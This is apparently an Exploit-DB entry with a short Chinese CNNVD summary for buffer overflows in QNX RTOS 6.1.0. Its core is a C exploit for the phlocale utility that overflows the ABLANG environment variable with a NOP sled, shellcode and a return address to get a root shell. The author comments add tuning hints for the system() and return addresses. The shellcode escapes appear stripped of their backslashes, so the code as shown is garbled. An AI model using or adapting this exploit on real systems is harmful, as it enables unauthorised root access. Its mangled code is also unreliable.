https://www.exploit-db.com/exploits/21505
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-738

realtimeoperatingsystem(RTOS)6.1.0版本存在多个缓冲区溢出漏洞。本地用户可以通过（1）超长phlocale中的ABLANG环境变量或（2）超长pkg-installer的-u选项执行任意代码。

/*
source: http://www.securityfocus.com/bid/4917/info

The QNX phlocale utility is prone to an exploitable buffer overflow condition. This is due to insufficient bounds checking of the ABLANG environment variable. Exploitation of this issue may result in execution of arbitrary attacker-supplied instructions as root. 
*/

/* QNX phlocale $ABLANG exploit, gives you a cute euid=0 shell. 
 * If it doesnt work for you, then you most likely need to change
 * the address to system() and/or the ret.
 * 
 * www.badc0ded.com 
*/

main ()
{ 
   char s[]="xebx0ex31xc0x5b"
            "x88x43x2x53xbb"
            "x80x95x04x08"       //system() address
            "xffxd3xe8xedxff"
            "xffxffx73x68";
   char payload[1000];
   memset (payload,0x90,sizeof(payload));
   sprintf(payload+971,"%s%s",s,"x78x7bx04x08");
   setenv("ABLANG",payload);
   execlp("/usr/photon/bin/phlocale","phlocale",0);
}

http://www.securityfocus.com/bid/4918※http://online.securityfocus.com/bid/4918※http://www.iss.net/security_center/static/9258.php※http://www.iss.net/security_center/static/9259.php※http://www.securityfocus.com/bid/4917※http://www.securityfocus.com/data/vulnerabilities/exploits/phlocale.c※